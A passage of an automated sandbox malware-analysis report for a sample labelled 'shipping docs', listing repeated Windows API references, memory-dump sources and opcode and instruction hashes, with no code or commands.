                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: e40631e8a59a96e54093bc0672dd4de8e27670116e521520c4689001efa48b36
                                                                                              • Instruction ID: 9a284cfdce034d083ebdd61d5ab70bb225b1519174a24c3731d7b29c231804eb
                                                                                              • Opcode Fuzzy Hash: e40631e8a59a96e54093bc0672dd4de8e27670116e521520c4689001efa48b36
                                                                                              • Instruction Fuzzy Hash: CBF1C734906258CFDB68DF74D898A9CB7B2BF49306F1045E9D60A66350CB399EC2CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: fb6dcba99297b9192954e82802bc328747a474e8836763402dfbf67143adaa77
                                                                                              • Instruction ID: 58c2d94ab182c9ea406c3a146a83fb15c126bf6dc803ebc90d849dbbd3f35568
                                                                                              • Opcode Fuzzy Hash: fb6dcba99297b9192954e82802bc328747a474e8836763402dfbf67143adaa77
                                                                                              • Instruction Fuzzy Hash: 7FF1C834906258CFDB68DF74D898A9CB7B2BF49306F1045E9D60A66350CB399EC2CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: d0a71ca3cbf9a3686a4c506afd8ad571df48dd9704e9654487df005afd1e7fe1
                                                                                              • Instruction ID: 7df3b73672f2ebece6b3914cc1a82f8b36f4ed2d7fc0fc45dfdec47cce93286a
                                                                                              • Opcode Fuzzy Hash: d0a71ca3cbf9a3686a4c506afd8ad571df48dd9704e9654487df005afd1e7fe1
                                                                                              • Instruction Fuzzy Hash: 31F1B734906258CFDB68DF74D898A9CB7B2BF49306F1045E9D60A66350CB399EC2CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: ef2a553a6ad1cf8e029cbf3a168699f5ee22221f67da963f4150a3867fbc6ffd
                                                                                              • Instruction ID: 3b06e132776348ddece960b8fb92c05d8e3152c6720f97bd1df5afd3765182e8
                                                                                              • Opcode Fuzzy Hash: ef2a553a6ad1cf8e029cbf3a168699f5ee22221f67da963f4150a3867fbc6ffd
                                                                                              • Instruction Fuzzy Hash: 08E1B734906258CFDB68DF64D898A9CB7B2BF49306F1045E9D60E66350CB399EC2CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: cc1f81d3a0ad603fb2816931bf7c12a275bd72200000014f02d183102a1fc88a
                                                                                              • Instruction ID: b4fc29ce9fd472306d2e7d8ba812a06b6e2ceab703d7b65d6e08de4aad0edde9
                                                                                              • Opcode Fuzzy Hash: cc1f81d3a0ad603fb2816931bf7c12a275bd72200000014f02d183102a1fc88a
                                                                                              • Instruction Fuzzy Hash: 00E1C734906218CFDB68DF64D898A9CB7B2BF49306F1045E9D60E66350CB399EC2CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: ba7d0b689ac59d75a1b560fef4f40accebeb6595d3cf4f96fb5d0f6817811c98
                                                                                              • Instruction ID: 51586a2a66f9aaa44f76a58757811c10e20e827609226fb142409087f39261ed
                                                                                              • Opcode Fuzzy Hash: ba7d0b689ac59d75a1b560fef4f40accebeb6595d3cf4f96fb5d0f6817811c98
                                                                                              • Instruction Fuzzy Hash: B2E1B734906258CFDB68DF64D898A9CB7B2BF49306F1045E9D60E66350CB399EC2CF61
Uniqueness
• Uniqueness Score: -1.00%

APIs
• KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
Memory Dump Source
• Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
Memory Dump Source
• Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
Memory Dump Source
• Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
Memory Dump Source
• Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.516802887.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2df0000_shipping docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
• Uniqueness Score: -1.00%

APIs
• KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
Memory Dump Source
• Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
Similarity
• API ID: DispatcherExceptionUser
• String ID:
• API String ID: 6842923-0
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.552253904.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6840000_shipping docs.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• DeleteFileW.KERNELBASE(00000000), ref: 061F86D8
Memory Dump Source
• Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
Similarity
• API ID: DeleteFile
• String ID:
• API String ID: 4033686569-0
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.552253904.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6840000_shipping docs.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 0684FB31
Memory Dump Source
• Source File: 00000003.00000002.552253904.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6840000_shipping docs.jbxd
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.KERNELBASE(80000001,00000000,?,00000001,?), ref: 0684F874
Memory Dump Source
• Source File: 00000003.00000002.552253904.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6840000_shipping docs.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNELBASE(?), ref: 02DFD742
Memory Dump Source
• Source File: 00000003.00000002.516802887.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2df0000_shipping docs.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNELBASE(?), ref: 02DFD742
Memory Dump Source
• Source File: 00000003.00000002.516802887.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2df0000_shipping docs.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 0684FB31
Memory Dump Source
• Source File: 00000003.00000002.552253904.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6840000_shipping docs.jbxd
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.KERNELBASE(80000001,00000000,?,00000001,?), ref: 0684F874
Memory Dump Source
• Source File: 00000003.00000002.552253904.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6840000_shipping docs.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 066FFBCF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.550173381.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_66f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: 81a63d595f096899f15891fc9e93652aaefab275ceff0618ec18753c7aa87f9c
                                                                                              • Instruction ID: e8b623aa1e51553b2bf323defa70082b0e6b38f7e83f3c91baa6a08321125ff9
                                                                                              • Opcode Fuzzy Hash: 81a63d595f096899f15891fc9e93652aaefab275ceff0618ec18753c7aa87f9c
                                                                                              • Instruction Fuzzy Hash: BF21E2B5900249AFDB10CFA9D984ADEFFF9FB48324F14845AE954A3310D378A944CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 066FFBCF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.550173381.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_66f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 3793708945-0
                                                                                              • Opcode ID: c73f5d6386e9029ea9386d158a85d1765852835fce2f7b4295da7ba4f8bbe813
                                                                                              • Instruction ID: abed57be82c723da877aa3aa3c9a03e59c5cb3beb61ef9f8cdf6830a0eaf2e4b
                                                                                              • Opcode Fuzzy Hash: c73f5d6386e9029ea9386d158a85d1765852835fce2f7b4295da7ba4f8bbe813
                                                                                              • Instruction Fuzzy Hash: 3521F3B5D002499FDB10CFA9D884ADEFBF8FB48324F14845AE954A3310D378A944CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 02DF582A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.516802887.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_2df0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: EncodePointer
                                                                                              • String ID:
                                                                                              • API String ID: 2118026453-0
                                                                                              • Opcode ID: cabd5bba06d228518f50fede5e8a4d1c7c229a630a35f151139c997a6b64a005
                                                                                              • Instruction ID: fb8d8e02ca285dc410d06731feca217abbcdcc8f6130edfc1053d9e7ed0a5140
                                                                                              • Opcode Fuzzy Hash: cabd5bba06d228518f50fede5e8a4d1c7c229a630a35f151139c997a6b64a005
                                                                                              • Instruction Fuzzy Hash: 5C21BE788003848FCB50CFA9E4497DABBF8FB08314F14806AD504A7741C379A585CFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DeleteFileW.KERNELBASE(00000000), ref: 061F86D8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteFile
                                                                                              • String ID:
                                                                                              • API String ID: 4033686569-0
                                                                                              • Opcode ID: 86dd6e4290d74e6387001f710137bc835a81320a181885e0deaa0849ac65cfde
                                                                                              • Instruction ID: 10a5e7940626996e2b0fd237a9be269b429576338b8eebea45786014aef24577
                                                                                              • Opcode Fuzzy Hash: 86dd6e4290d74e6387001f710137bc835a81320a181885e0deaa0849ac65cfde
                                                                                              • Instruction Fuzzy Hash: 312142B1C1065A8BCB50CF9AC444BAEFBB4FB48224F05816AE918B7240D738A945CFE1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RtlEncodePointer.NTDLL(00000000), ref: 02DF582A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.516802887.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_2df0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: EncodePointer
                                                                                              • String ID:
                                                                                              • API String ID: 2118026453-0
                                                                                              • Opcode ID: 915dc2eef03c24d4f1003f9c0435b7c6335a3abd9655ce7998ecc8822bcc8fcc
                                                                                              • Instruction ID: c35353984d996f709a1ccafb44e341ab17e4f7098b849d2f898db209b9813a3f
                                                                                              • Opcode Fuzzy Hash: 915dc2eef03c24d4f1003f9c0435b7c6335a3abd9655ce7998ecc8822bcc8fcc
                                                                                              • Instruction Fuzzy Hash: 25116AB89003898FCB50CFA9E54879EBBF8FB48314F548029D505A7740D779A984CFA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • VirtualAllocExNuma.KERNELBASE(?,?,?,?,?,?), ref: 02DF0B06
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.516802887.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_2df0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocNumaVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4233825816-0
                                                                                              • Opcode ID: 063535e5b50ff8b9df82fccb0e93658ccfa7af12839cffaabd029957b8b22bd1
                                                                                              • Instruction ID: ebeea86389e6f034e05049ff699e64f1d336f24086b2cb7d05173ed9190dc63f
                                                                                              • Opcode Fuzzy Hash: 063535e5b50ff8b9df82fccb0e93658ccfa7af12839cffaabd029957b8b22bd1
                                                                                              • Instruction Fuzzy Hash: 1D1123B19002499FCB10CF9AD884BDFBBF4FB88324F158419E558A7310C375A944CFA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.516802887.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_2df0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: e1342325ca2dc3e138ea310d9cc6852ae40e7f0149c984455c0d2a02d0219805
                                                                                              • Instruction ID: 182ff90c8a7626a79cdfcaaf58d2e2d58c8251bf7ec613018dcb7ee1ff87c232
                                                                                              • Opcode Fuzzy Hash: e1342325ca2dc3e138ea310d9cc6852ae40e7f0149c984455c0d2a02d0219805
                                                                                              • Instruction Fuzzy Hash: B11100B09002498FCB10DF9AD489BDEBBF4AB48328F11845AD559A7340D374A944CFA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.516802887.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_2df0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: 3d5f42c830de16bbcdb87874af3b0e16e178a5ed2f1cdb3c447e243a58151201
                                                                                              • Instruction ID: 0dc941471aaa177b8d1d2de99c9c5becd101b8a41fefebde069c41da0143f080
                                                                                              • Opcode Fuzzy Hash: 3d5f42c830de16bbcdb87874af3b0e16e178a5ed2f1cdb3c447e243a58151201
                                                                                              • Instruction Fuzzy Hash: 72111EB08002498FCB10CF9AD484BDEFBF4FB88328F11845AD568A7340C374A944CFA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.515938608.0000000002CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CBD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_2cbd000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 15c55003f52b560274cda59af694287df9edd388a0734da46c7a517345bd268a
                                                                                              • Instruction ID: 3467a0a27a0449c74922ab52c47624a629bba6dbb25a6619b04f5414ad860f74
                                                                                              • Opcode Fuzzy Hash: 15c55003f52b560274cda59af694287df9edd388a0734da46c7a517345bd268a
                                                                                              • Instruction Fuzzy Hash: BA716F7544E7C0AFD3138B309CA5BC67F709F43219F5980EBE1C48A1B3D26A995AC762
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.515690458.0000000002CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CAD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_2cad000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 76f20bf575b366a57116dd1a8fc0ea9a5099c9478714c0e8432c67ab291c799d
                                                                                              • Instruction ID: 39548bf6f686a6aa8b428ee04bf1fff93716a6baaea88c7b8d34479142127528
                                                                                              • Opcode Fuzzy Hash: 76f20bf575b366a57116dd1a8fc0ea9a5099c9478714c0e8432c67ab291c799d
                                                                                              • Instruction Fuzzy Hash: 672164F2504245DFDB04CF00D8D4B26BBA5FB8832CF2486A9E9074B606C336D946CBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.515938608.0000000002CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CBD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_2cbd000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1116ed96bb984c60129c4deeeb6146bba5e01f8347a40f9eb86a905961fafc49
                                                                                              • Instruction ID: ce7941dae5cab19c3bc929614e8bb3fd7ca81caa27831802596253aefa50af6e
                                                                                              • Opcode Fuzzy Hash: 1116ed96bb984c60129c4deeeb6146bba5e01f8347a40f9eb86a905961fafc49
                                                                                              • Instruction Fuzzy Hash: A42125B1604244DFDB01CF90D8C0BA6BB65FF88714F24C969D9494B346C336D806CEA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.515690458.0000000002CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CAD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_2cad000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a4ebfea70809b752dd87daf1091c6fefd11053e22c75fac3715a094701740d1c
                                                                                              • Instruction ID: 50fe0d25d68a62026106d3e5c84846c568cfe49c6e3b21038468ea5e132ce23f
                                                                                              • Opcode Fuzzy Hash: a4ebfea70809b752dd87daf1091c6fefd11053e22c75fac3715a094701740d1c
                                                                                              • Instruction Fuzzy Hash: 7D11D3B6404281CFCB11CF10D5C4B16BF71FB88328F2486A9D8060B656C33AD556CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%